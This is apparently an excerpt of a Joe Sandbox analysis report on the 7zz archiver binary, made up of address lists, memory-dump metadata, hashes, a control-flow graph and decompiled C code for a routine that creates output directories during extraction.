                                                                                                                                    0x00412c8a
                                                                                                                                    0x004121ad
                                                                                                                                    0x004121b3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004121b9
                                                                                                                                    0x004121bf
                                                                                                                                    0x004121f0
                                                                                                                                    0x004121f4
                                                                                                                                    0x00412203
                                                                                                                                    0x0041220b
                                                                                                                                    0x0041220d
                                                                                                                                    0x0041220f
                                                                                                                                    0x00412222
                                                                                                                                    0x00412227
                                                                                                                                    0x00412235
                                                                                                                                    0x00412239
                                                                                                                                    0x00412bb4
                                                                                                                                    0x00412bb8
                                                                                                                                    0x00412bbd
                                                                                                                                    0x00412bc2
                                                                                                                                    0x00412bc5
                                                                                                                                    0x00412bcb
                                                                                                                                    0x00000000
                                                                                                                                    0x00412bcb
                                                                                                                                    0x0041223f
                                                                                                                                    0x00412242
                                                                                                                                    0x00412245
                                                                                                                                    0x00412249
                                                                                                                                    0x0041224e
                                                                                                                                    0x00412254
                                                                                                                                    0x00412258
                                                                                                                                    0x00412259
                                                                                                                                    0x0041225b
                                                                                                                                    0x0041225e
                                                                                                                                    0x00412263
                                                                                                                                    0x00412265
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412270
                                                                                                                                    0x00412274
                                                                                                                                    0x00412275
                                                                                                                                    0x00412277
                                                                                                                                    0x00412278
                                                                                                                                    0x0041227d
                                                                                                                                    0x0041227f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041228a
                                                                                                                                    0x0041228e
                                                                                                                                    0x0041228f
                                                                                                                                    0x00412291
                                                                                                                                    0x00412292
                                                                                                                                    0x00412297
                                                                                                                                    0x00412299
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004122a2
                                                                                                                                    0x004122ac
                                                                                                                                    0x004122ad
                                                                                                                                    0x004122b1
                                                                                                                                    0x004122b6
                                                                                                                                    0x004122b8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004122c1
                                                                                                                                    0x004122c6
                                                                                                                                    0x004122cb
                                                                                                                                    0x004122d4
                                                                                                                                    0x004122d8
                                                                                                                                    0x004122dd
                                                                                                                                    0x004122e0
                                                                                                                                    0x004122e2
                                                                                                                                    0x004122f3
                                                                                                                                    0x004122f6
                                                                                                                                    0x004122f6
                                                                                                                                    0x004122f7
                                                                                                                                    0x00412302
                                                                                                                                    0x00412308
                                                                                                                                    0x0041230a
                                                                                                                                    0x0041230d
                                                                                                                                    0x0041231b
                                                                                                                                    0x0041231b
                                                                                                                                    0x0041231d
                                                                                                                                    0x0041231d
                                                                                                                                    0x00412320
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412335
                                                                                                                                    0x0041233a
                                                                                                                                    0x0041233c
                                                                                                                                    0x0041234e
                                                                                                                                    0x00000000
                                                                                                                                    0x0041234e
                                                                                                                                    0x0041233e
                                                                                                                                    0x00412345
                                                                                                                                    0x004125c9
                                                                                                                                    0x004125cc
                                                                                                                                    0x004125d4
                                                                                                                                    0x004125d8
                                                                                                                                    0x004125dd
                                                                                                                                    0x00412b4c
                                                                                                                                    0x00412b4f
                                                                                                                                    0x00412b55
                                                                                                                                    0x00000000
                                                                                                                                    0x00412b55
                                                                                                                                    0x00412351
                                                                                                                                    0x00412356
                                                                                                                                    0x0041235d
                                                                                                                                    0x00412365
                                                                                                                                    0x00412370
                                                                                                                                    0x00412375
                                                                                                                                    0x00412378
                                                                                                                                    0x0041237c
                                                                                                                                    0x00412429
                                                                                                                                    0x0041242c
                                                                                                                                    0x0041242f
                                                                                                                                    0x00412433
                                                                                                                                    0x00412438
                                                                                                                                    0x0041243e
                                                                                                                                    0x00412442
                                                                                                                                    0x0041247c
                                                                                                                                    0x0041247f
                                                                                                                                    0x00412925
                                                                                                                                    0x00412925
                                                                                                                                    0x00412928
                                                                                                                                    0x00412b76
                                                                                                                                    0x00412b7d
                                                                                                                                    0x00412b85
                                                                                                                                    0x00412b8d
                                                                                                                                    0x00412b93
                                                                                                                                    0x00412b9a
                                                                                                                                    0x00412b9e
                                                                                                                                    0x00412ba6
                                                                                                                                    0x00412baa
                                                                                                                                    0x00000000
                                                                                                                                    0x00412baa
                                                                                                                                    0x0041292e
                                                                                                                                    0x00412930
                                                                                                                                    0x00412935
                                                                                                                                    0x00412938
                                                                                                                                    0x00412a0e
                                                                                                                                    0x00412a0e
                                                                                                                                    0x0041293e
                                                                                                                                    0x0041293e
                                                                                                                                    0x00412941
                                                                                                                                    0x00412945
                                                                                                                                    0x0041294b
                                                                                                                                    0x0041294b
                                                                                                                                    0x00412a10
                                                                                                                                    0x00412a12
                                                                                                                                    0x00412a18
                                                                                                                                    0x00412a1b
                                                                                                                                    0x00412a20
                                                                                                                                    0x00412a20
                                                                                                                                    0x00412a2b
                                                                                                                                    0x00412a31
                                                                                                                                    0x00412a35
                                                                                                                                    0x00412a3a
                                                                                                                                    0x00412a3e
                                                                                                                                    0x00412a47
                                                                                                                                    0x00412a4c
                                                                                                                                    0x00412a4e
                                                                                                                                    0x00412aea
                                                                                                                                    0x00412aed
                                                                                                                                    0x00412b5c
                                                                                                                                    0x00412b63
                                                                                                                                    0x00412b6b
                                                                                                                                    0x00412b6f
                                                                                                                                    0x00412b71
                                                                                                                                    0x00000000
                                                                                                                                    0x00412b71
                                                                                                                                    0x00412aef
                                                                                                                                    0x00412b00
                                                                                                                                    0x00412b03
                                                                                                                                    0x00412b05
                                                                                                                                    0x00412b08
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412b0a
                                                                                                                                    0x00412b0c
                                                                                                                                    0x00412b10
                                                                                                                                    0x00412b15
                                                                                                                                    0x00412b15
                                                                                                                                    0x00412b1b
                                                                                                                                    0x00412b23
                                                                                                                                    0x00412b29
                                                                                                                                    0x00412b34
                                                                                                                                    0x00412b38
                                                                                                                                    0x00412b40
                                                                                                                                    0x00412b44
                                                                                                                                    0x00412b49
                                                                                                                                    0x00412a54
                                                                                                                                    0x00412a60
                                                                                                                                    0x00412a65
                                                                                                                                    0x00412a6b
                                                                                                                                    0x00412a72
                                                                                                                                    0x00412a75
                                                                                                                                    0x00412a78
                                                                                                                                    0x00412a7a
                                                                                                                                    0x00412a7c
                                                                                                                                    0x00412ab4
                                                                                                                                    0x00412ab9
                                                                                                                                    0x00412abc
                                                                                                                                    0x00412ac0
                                                                                                                                    0x00412ac5
                                                                                                                                    0x00412ac5
                                                                                                                                    0x00412acb
                                                                                                                                    0x00412ad3
                                                                                                                                    0x00412ad9
                                                                                                                                    0x00412ae1
                                                                                                                                    0x00412686
                                                                                                                                    0x00412689
                                                                                                                                    0x00412691
                                                                                                                                    0x00412695
                                                                                                                                    0x00000000
                                                                                                                                    0x00412695
                                                                                                                                    0x00412a7e
                                                                                                                                    0x00412a83
                                                                                                                                    0x00412a86
                                                                                                                                    0x00412a8a
                                                                                                                                    0x00412a8f
                                                                                                                                    0x00412a8f
                                                                                                                                    0x00412a95
                                                                                                                                    0x00412a9d
                                                                                                                                    0x00412aa3
                                                                                                                                    0x00412aab
                                                                                                                                    0x004129c7
                                                                                                                                    0x004129ca
                                                                                                                                    0x004129d2
                                                                                                                                    0x004129d6
                                                                                                                                    0x004129db
                                                                                                                                    0x004129db
                                                                                                                                    0x00000000
                                                                                                                                    0x00412a4e
                                                                                                                                    0x00412488
                                                                                                                                    0x0041248d
                                                                                                                                    0x00412496
                                                                                                                                    0x0041249a
                                                                                                                                    0x0041249f
                                                                                                                                    0x004124a1
                                                                                                                                    0x00412918
                                                                                                                                    0x0041291b
                                                                                                                                    0x0041291f
                                                                                                                                    0x00000000
                                                                                                                                    0x00412924
                                                                                                                                    0x004124aa
                                                                                                                                    0x004124aa
                                                                                                                                    0x004124ac
                                                                                                                                    0x00412503
                                                                                                                                    0x00412505
                                                                                                                                    0x00412513
                                                                                                                                    0x00412532
                                                                                                                                    0x00412534
                                                                                                                                    0x00412536
                                                                                                                                    0x0041257c
                                                                                                                                    0x0041257c
                                                                                                                                    0x0041257e
                                                                                                                                    0x004126a6
                                                                                                                                    0x004126a6
                                                                                                                                    0x004126ab
                                                                                                                                    0x004126ab
                                                                                                                                    0x004126ae
                                                                                                                                    0x004126b1
                                                                                                                                    0x00412761
                                                                                                                                    0x00412764
                                                                                                                                    0x00412955
                                                                                                                                    0x0041295a
                                                                                                                                    0x0041295c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412967
                                                                                                                                    0x00412975
                                                                                                                                    0x00412979
                                                                                                                                    0x00412981
                                                                                                                                    0x00412985
                                                                                                                                    0x0041298a
                                                                                                                                    0x00412994
                                                                                                                                    0x00412997
                                                                                                                                    0x0041299a
                                                                                                                                    0x0041299c
                                                                                                                                    0x0041299e
                                                                                                                                    0x004129e2
                                                                                                                                    0x004129ea
                                                                                                                                    0x004129f2
                                                                                                                                    0x004129fa
                                                                                                                                    0x00412a02
                                                                                                                                    0x00412a05
                                                                                                                                    0x00000000
                                                                                                                                    0x00412a05
                                                                                                                                    0x004129a0
                                                                                                                                    0x004129a8
                                                                                                                                    0x004129b0
                                                                                                                                    0x004129b8
                                                                                                                                    0x004129c0
                                                                                                                                    0x004129c3
                                                                                                                                    0x00000000
                                                                                                                                    0x004129c3
                                                                                                                                    0x00412771
                                                                                                                                    0x00412779
                                                                                                                                    0x0041277d
                                                                                                                                    0x00412782
                                                                                                                                    0x00412784
                                                                                                                                    0x00412823
                                                                                                                                    0x00412828
                                                                                                                                    0x0041282a
                                                                                                                                    0x00412912
                                                                                                                                    0x00000000
                                                                                                                                    0x00412917
                                                                                                                                    0x00412839
                                                                                                                                    0x00412847
                                                                                                                                    0x0041284b
                                                                                                                                    0x00412853
                                                                                                                                    0x00412857
                                                                                                                                    0x0041285c
                                                                                                                                    0x00412866
                                                                                                                                    0x00412869
                                                                                                                                    0x0041286c
                                                                                                                                    0x0041286e
                                                                                                                                    0x00412870
                                                                                                                                    0x004128b7
                                                                                                                                    0x004128bf
                                                                                                                                    0x004128c7
                                                                                                                                    0x004128cf
                                                                                                                                    0x004128d7
                                                                                                                                    0x004128df
                                                                                                                                    0x004128e2
                                                                                                                                    0x004128e6
                                                                                                                                    0x004128e9
                                                                                                                                    0x004128f1
                                                                                                                                    0x004128f5
                                                                                                                                    0x004128fa
                                                                                                                                    0x004128fa
                                                                                                                                    0x004128ff
                                                                                                                                    0x00412902
                                                                                                                                    0x00412908
                                                                                                                                    0x00000000
                                                                                                                                    0x00412908
                                                                                                                                    0x00412872
                                                                                                                                    0x0041287a
                                                                                                                                    0x00412882
                                                                                                                                    0x0041288a
                                                                                                                                    0x00412892
                                                                                                                                    0x0041289a
                                                                                                                                    0x0041289d
                                                                                                                                    0x004128a1
                                                                                                                                    0x004128a4
                                                                                                                                    0x004128ac
                                                                                                                                    0x004128b0
                                                                                                                                    0x00000000
                                                                                                                                    0x004128b0
                                                                                                                                    0x0041278a
                                                                                                                                    0x00412797
                                                                                                                                    0x0041279c
                                                                                                                                    0x004127a2
                                                                                                                                    0x004127a9
                                                                                                                                    0x004127ac
                                                                                                                                    0x004127af
                                                                                                                                    0x004127b1
                                                                                                                                    0x004127b3
                                                                                                                                    0x004127e9
                                                                                                                                    0x004127f1
                                                                                                                                    0x004127f9
                                                                                                                                    0x00412801
                                                                                                                                    0x00412809
                                                                                                                                    0x00412811
                                                                                                                                    0x00412814
                                                                                                                                    0x00000000
                                                                                                                                    0x00412814
                                                                                                                                    0x004127b5
                                                                                                                                    0x004127bd
                                                                                                                                    0x004127c5
                                                                                                                                    0x004127cd
                                                                                                                                    0x004127d5
                                                                                                                                    0x004127dd
                                                                                                                                    0x004127e0
                                                                                                                                    0x00000000
                                                                                                                                    0x004127e0
                                                                                                                                    0x004126ba
                                                                                                                                    0x004126bf
                                                                                                                                    0x004126c1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004126d0
                                                                                                                                    0x004126de
                                                                                                                                    0x004126e2
                                                                                                                                    0x004126ea
                                                                                                                                    0x004126ee
                                                                                                                                    0x004126f3
                                                                                                                                    0x004126fd
                                                                                                                                    0x00412700
                                                                                                                                    0x00412703
                                                                                                                                    0x00412705
                                                                                                                                    0x00412707
                                                                                                                                    0x00412735
                                                                                                                                    0x0041273d
                                                                                                                                    0x00412745
                                                                                                                                    0x0041274d
                                                                                                                                    0x00412755
                                                                                                                                    0x00412758
                                                                                                                                    0x00000000
                                                                                                                                    0x00412758
                                                                                                                                    0x00412709
                                                                                                                                    0x00412711
                                                                                                                                    0x00412719
                                                                                                                                    0x00412721
                                                                                                                                    0x00412729
                                                                                                                                    0x0041272c
                                                                                                                                    0x00000000
                                                                                                                                    0x0041272c
                                                                                                                                    0x00412584
                                                                                                                                    0x00412584
                                                                                                                                    0x00412585
                                                                                                                                    0x0041269f
                                                                                                                                    0x00000000
                                                                                                                                    0x0041269f
                                                                                                                                    0x0041258b
                                                                                                                                    0x0041258b
                                                                                                                                    0x0041258c
                                                                                                                                    0x00412663
                                                                                                                                    0x0041266b
                                                                                                                                    0x00412673
                                                                                                                                    0x0041267b
                                                                                                                                    0x00412682
                                                                                                                                    0x00000000
                                                                                                                                    0x00412682
                                                                                                                                    0x00412592
                                                                                                                                    0x00412592
                                                                                                                                    0x00412593
                                                                                                                                    0x00412634
                                                                                                                                    0x0041263b
                                                                                                                                    0x00412643
                                                                                                                                    0x0041264b
                                                                                                                                    0x00412653
                                                                                                                                    0x0041265a
                                                                                                                                    0x00000000
                                                                                                                                    0x0041265a
                                                                                                                                    0x00412599
                                                                                                                                    0x00412599
                                                                                                                                    0x0041259a
                                                                                                                                    0x00412628
                                                                                                                                    0x00000000
                                                                                                                                    0x00412628
                                                                                                                                    0x004125a0
                                                                                                                                    0x004125a3
                                                                                                                                    0x004125a4
                                                                                                                                    0x004125e7
                                                                                                                                    0x004125ef
                                                                                                                                    0x004125f7
                                                                                                                                    0x004125ff
                                                                                                                                    0x00412609
                                                                                                                                    0x0041260d
                                                                                                                                    0x00412615
                                                                                                                                    0x00412619
                                                                                                                                    0x0041261e
                                                                                                                                    0x00000000
                                                                                                                                    0x0041261e
                                                                                                                                    0x004125a6
                                                                                                                                    0x004125ae
                                                                                                                                    0x004125b6
                                                                                                                                    0x004125be
                                                                                                                                    0x004125c5
                                                                                                                                    0x00000000
                                                                                                                                    0x004125c5
                                                                                                                                    0x0041253b
                                                                                                                                    0x00412543
                                                                                                                                    0x0041254b
                                                                                                                                    0x00412553
                                                                                                                                    0x0041255d
                                                                                                                                    0x00412561
                                                                                                                                    0x00412569
                                                                                                                                    0x0041256d
                                                                                                                                    0x00412572
                                                                                                                                    0x00000000
                                                                                                                                    0x00412572
                                                                                                                                    0x004124af
                                                                                                                                    0x004124b0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004124b9
                                                                                                                                    0x004124c1
                                                                                                                                    0x004124c9
                                                                                                                                    0x004124d1
                                                                                                                                    0x004124d7
                                                                                                                                    0x004124db
                                                                                                                                    0x004124e3
                                                                                                                                    0x004124e7
                                                                                                                                    0x00000000
                                                                                                                                    0x004124e7
                                                                                                                                    0x00412444
                                                                                                                                    0x0041244d
                                                                                                                                    0x00412452
                                                                                                                                    0x00412455
                                                                                                                                    0x00412459
                                                                                                                                    0x00412459
                                                                                                                                    0x00412461
                                                                                                                                    0x00412469
                                                                                                                                    0x0041246f
                                                                                                                                    0x00412473
                                                                                                                                    0x00000000
                                                                                                                                    0x00412473
                                                                                                                                    0x00412382
                                                                                                                                    0x00412388
                                                                                                                                    0x0041239b
                                                                                                                                    0x0041239b
                                                                                                                                    0x0041239e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004123a9
                                                                                                                                    0x004123ac
                                                                                                                                    0x004123af
                                                                                                                                    0x004123b2
                                                                                                                                    0x004123bc
                                                                                                                                    0x004123c1
                                                                                                                                    0x004123c5
                                                                                                                                    0x004123ca
                                                                                                                                    0x004123d0
                                                                                                                                    0x0041241c
                                                                                                                                    0x0041241f
                                                                                                                                    0x00412423
                                                                                                                                    0x00000000
                                                                                                                                    0x00412428
                                                                                                                                    0x004123d2
                                                                                                                                    0x004123d5
                                                                                                                                    0x004123e1
                                                                                                                                    0x004123e1
                                                                                                                                    0x004123e4
                                                                                                                                    0x004123e7
                                                                                                                                    0x004123ee
                                                                                                                                    0x004123ee
                                                                                                                                    0x004123e9
                                                                                                                                    0x004123e9
                                                                                                                                    0x004123e9
                                                                                                                                    0x004123f0
                                                                                                                                    0x004123f0
                                                                                                                                    0x004123f3
                                                                                                                                    0x004123ff
                                                                                                                                    0x004123ff
                                                                                                                                    0x004123ff
                                                                                                                                    0x00412401
                                                                                                                                    0x00412401
                                                                                                                                    0x00412404
                                                                                                                                    0x00412410
                                                                                                                                    0x00412410
                                                                                                                                    0x00412410
                                                                                                                                    0x00412412
                                                                                                                                    0x00412417
                                                                                                                                    0x00000000
                                                                                                                                    0x00412417
                                                                                                                                    0x00412406
                                                                                                                                    0x00412409
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041240b
                                                                                                                                    0x00000000
                                                                                                                                    0x0041240b
                                                                                                                                    0x004123f5
                                                                                                                                    0x004123f8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004123fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004123fa
                                                                                                                                    0x004123d7
                                                                                                                                    0x004123da
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004123dc
                                                                                                                                    0x00000000
                                                                                                                                    0x004123dc
                                                                                                                                    0x0041238a
                                                                                                                                    0x0041238d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412396
                                                                                                                                    0x00000000
                                                                                                                                    0x00412396
                                                                                                                                    0x0041230f
                                                                                                                                    0x00412312
                                                                                                                                    0x00000000
                                                                                                                                    0x00412312
                                                                                                                                    0x004122f9
                                                                                                                                    0x004122fa
                                                                                                                                    0x004122fd
                                                                                                                                    0x004122fd
                                                                                                                                    0x00000000
                                                                                                                                    0x004122fa
                                                                                                                                    0x004122e4
                                                                                                                                    0x004122e7
                                                                                                                                    0x00000000
                                                                                                                                    0x004122e7
                                                                                                                                    0x0041222c
                                                                                                                                    0x00412230
                                                                                                                                    0x00000000
                                                                                                                                    0x00412230
                                                                                                                                    0x00412214
                                                                                                                                    0x00412218
                                                                                                                                    0x00000000
                                                                                                                                    0x00412218
                                                                                                                                    0x004121c1
                                                                                                                                    0x004121c3
                                                                                                                                    0x004121c8
                                                                                                                                    0x004121cb
                                                                                                                                    0x004121da
                                                                                                                                    0x004121da
                                                                                                                                    0x004121cd
                                                                                                                                    0x004121cd
                                                                                                                                    0x004121d0
                                                                                                                                    0x004121d6
                                                                                                                                    0x004121d6
                                                                                                                                    0x004121dc
                                                                                                                                    0x004121de
                                                                                                                                    0x004121e3
                                                                                                                                    0x004121e3
                                                                                                                                    0x004121e9
                                                                                                                                    0x00000000
                                                                                                                                    0x004121e9
                                                                                                                                    0x00412189
                                                                                                                                    0x00412197
                                                                                                                                    0x0041219c
                                                                                                                                    0x0041219e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041219e
                                                                                                                                    0x00412127
                                                                                                                                    0x0041212c
                                                                                                                                    0x00412142
                                                                                                                                    0x00412146
                                                                                                                                    0x0041214c
                                                                                                                                    0x00000000
                                                                                                                                    0x0041214c
                                                                                                                                    0x00412131
                                                                                                                                    0x00412135
                                                                                                                                    0x00000000
                                                                                                                                    0x00412135
                                                                                                                                    0x00412110
                                                                                                                                    0x00412114
                                                                                                                                    0x00412119
                                                                                                                                    0x00000000
                                                                                                                                    0x00412119
                                                                                                                                    0x004120c3
                                                                                                                                    0x004120c3
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: ,$59@$can not open output file
                                                                                                                                    • API String ID: 3519838083-2797906540
                                                                                                                                    • Opcode ID: 88cacbc9cc5ebba114acfde945fed22db848cc253e79b862fc12f02dc01daed1
                                                                                                                                    • Instruction ID: cf4575037a337767e5e75bbbc8f08648ffbb7fd2cc7ee605cc239c560f10ba1b
                                                                                                                                    • Opcode Fuzzy Hash: 88cacbc9cc5ebba114acfde945fed22db848cc253e79b862fc12f02dc01daed1
                                                                                                                                    • Instruction Fuzzy Hash: 7682CD30D04248EFDF11EFA4DA40ADDBBB0AF54308F14446EE045B7292DB796E58DB6A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00416922 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 261COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1950 416922-41695d __EH_prolog call 404ad0 1953 416963-41696f 1950->1953 1954 416a25-416a93 call 404ad0 call 4039c0 call 403532 call 417172 call 416c31 call 407a18 * 2 1950->1954 1959 416971-416973 1953->1959 1960 416978-41697e 1953->1960 1995 416a95-416a98 call 409d7c 1954->1995 1996 416b09-416b4a call 411c21 call 4192f5 1954->1996 1962 416a02-416a10 call 408604 1959->1962 1963 416980-4169a8 call 401e9a call 4179f7 1960->1963 1964 4169f5-4169f8 1960->1964 1972 416c20-416c2e 1962->1972 1977 416a15-416a20 call 407a18 1963->1977 1978 4169aa-4169ba call 4179e9 1963->1978 1964->1954 1967 4169fa-4169fd 1964->1967 1967->1962 1988 416c12-416c1e call 408604 1977->1988 1978->1977 1987 4169bc-4169d1 call 408e6d 1978->1987 1997 4169d3-4169d9 call 415c6d 1987->1997 1998 4169de-4169f3 call 407a18 1987->1998 1988->1972 2003 416a9d-416a9f 1995->2003 2012 416b68-416b6b 1996->2012 2013 416b4c-416b63 call 407a18 1996->2013 1997->1998 1998->1963 1998->1964 2003->1996 2006 416aa1-416aab GetLastError 2003->2006 2008 416ab2-416b04 call 403532 call 40b0a0 call 401e26 call 407a18 * 3 2006->2008 2009 416aad 2006->2009 2025 416bff-416c0d call 40862d call 408604 2008->2025 2009->2008 2016 416b77 2012->2016 2017 416b6d-416b70 2012->2017 2013->2025 2018 416b79-416b81 2016->2018 2017->2016 2021 416b72-416b75 2017->2021 2022 416b83-416ba6 2018->2022 2023 416bd4-416bda 2018->2023 2021->2018 2039 416bc6-416bd2 call 40c20f 2022->2039 2040 416ba8-416bad 2022->2040 2054 416bdb call 4290c5 2023->2054 2055 416bdb call 4297ca 2023->2055 2025->1988 2028 416bde 2032 416be0-416be4 2028->2032 2052 416be6 call 407cd5 2032->2052 2053 416be6 call 46c55c 2032->2053 2038 416be9-416bfb call 407a18 2038->2025 2039->2032 2043 416bb6-416bc3 call 40c5ad 2040->2043 2044 416baf-416bb4 2040->2044 2043->2039 2044->2039 2044->2043 2052->2038 2053->2038 2054->2028 2055->2028
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E00416922(intOrPtr __ecx, signed int __edx, void* __eflags) {
				intOrPtr* _t123;
				void* _t130;
				signed int _t144;
				signed int _t153;
				signed int _t156;
				intOrPtr _t158;
				signed int _t160;
				void* _t162;
				void* _t163;
				signed int _t169;
				signed int _t175;
				signed int _t180;
				signed int _t185;
				intOrPtr _t198;
				intOrPtr* _t208;
				signed int* _t227;
				intOrPtr* _t231;
				signed int* _t234;
				void* _t235;
				signed int _t236;
				void* _t238;

				L0046B890(E00474B3C, _t238);
				_t123 =  *((intOrPtr*)(_t238 + 0x20));
				_t185 = 0;
				 *_t123 = 0;
				 *((intOrPtr*)(_t123 + 4)) = 0;
				_t231 =  *((intOrPtr*)(__ecx));
				 *((intOrPtr*)(_t238 - 0x14)) = __ecx;
				 *(_t238 - 0x1c) = __edx;
				E00404AD0(_t238 - 0x58, 4);
				 *((intOrPtr*)(_t238 - 0x58)) = 0x47ab80;
				_t234 =  *(_t238 + 0x10);
				 *(_t238 - 4) = 0;
				if( *_t234 != 0) {
					L13:
					E00404AD0(_t238 - 0x6c, 4);
					 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
					 *(_t238 - 4) = 2;
					L004039C0(_t238 - 0x34,  &(_t234[4]));
					 *(_t238 - 4) = 3;
					L00403532(_t238 - 0x28, 0x48bb7c);
					 *(_t238 - 4) = 4;
					_t130 = L00417172(_t238 - 0x40,  *((intOrPtr*)(_t238 - 0x14)) + 0x10, __eflags);
					 *(_t238 - 4) = 5;
					L00416C31(_t238 - 0x34, _t238 - 0x28, _t130);
					E00407A18( *((intOrPtr*)(_t238 - 0x40)));
					 *(_t238 - 4) = 3;
					E00407A18( *(_t238 - 0x28));
					__eflags =  *((intOrPtr*)(_t238 - 0x30)) - _t185;
					if( *((intOrPtr*)(_t238 - 0x30)) == _t185) {
						L18:
						asm("sbb eax, eax");
						E00411C21( *((intOrPtr*)(_t238 + 0x18)),  ~( *_t234) &  *(_t238 - 0x1c),  *((intOrPtr*)(_t238 - 0x14)),  *((intOrPtr*)(_t238 + 0x14)), _t234[0], _t234[0], _t234[1], _t238 - 0x34, _t238 - 0x6c,  *((intOrPtr*)(_t238 + 8)),  *((intOrPtr*)(_t238 + 0xc)));
						_t227 =  &(_t234[7]);
						_t144 = E004192F5(_t231, _t227);
						__eflags = _t144 - _t185;
						 *(_t238 + 0x10) = _t144;
						if(_t144 == _t185) {
							__eflags = _t234[0] - _t185;
							if(_t234[0] == _t185) {
								L23:
								__eflags = 0;
							} else {
								__eflags = _t234[1] - _t185;
								if(_t234[1] != _t185) {
									goto L23;
								} else {
									_push(1);
									_pop(0);
								}
							}
							_push( *((intOrPtr*)(_t238 + 0x18)));
							__eflags =  *_t234 - _t185;
							_t198 =  *_t231;
							_push(0);
							if( *_t234 == _t185) {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231,  *((intOrPtr*)(_t238 - 0x4c)),  *((intOrPtr*)(_t238 - 0x50)));
							} else {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231, _t185, 0xffffffff);
								 *(_t238 - 0x44) = _t185;
								 *(_t238 - 0x42) = _t185;
								 *(_t238 - 4) = 0xa;
								_t156 =  *((intOrPtr*)( *_t231 + 0x20))(_t231, 0x2c, _t238 - 0x44);
								__eflags = _t156;
								if(_t156 == 0) {
									__eflags =  *(_t238 - 0x44) - 0x15;
									if( *(_t238 - 0x44) == 0x15) {
										L28:
										_t158 = E0040C5AD(_t238 - 0x44);
										_t208 =  *((intOrPtr*)(_t238 + 0x20));
										 *_t208 = _t158;
										 *(_t208 + 4) = _t227;
									} else {
										__eflags =  *(_t238 - 0x44) - 0x13;
										if( *(_t238 - 0x44) == 0x13) {
											goto L28;
										}
									}
								}
								 *(_t238 - 4) = 3;
								E0040C20F(_t238 - 0x44);
							}
							_t236 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x30))(_t235);
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 0xb;
						} else {
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							_t236 =  *(_t238 + 0x10);
							 *(_t238 - 4) = 9;
						}
					} else {
						_t160 = E00409D7C( *((intOrPtr*)(_t238 - 0x34))); // executed
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						} else {
							_t236 = GetLastError();
							__eflags = _t236 - _t185;
							if(_t236 == _t185) {
								_t236 = 0x80004005;
							}
							_t162 = L00403532(_t238 - 0x28, L"Can not create output directory ");
							_push(_t238 - 0x34);
							 *(_t238 - 4) = 6;
							_t163 = L0040B0A0(_t238 - 0x40, _t162);
							 *(_t238 - 4) = 7;
							E00401E26( *((intOrPtr*)(_t238 + 0x1c)), _t163);
							E00407A18( *((intOrPtr*)(_t238 - 0x40)));
							E00407A18( *(_t238 - 0x28));
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 8;
						}
					}
					E0040862D();
					 *(_t238 - 4) = _t185;
					E00408604(_t238 - 0x6c);
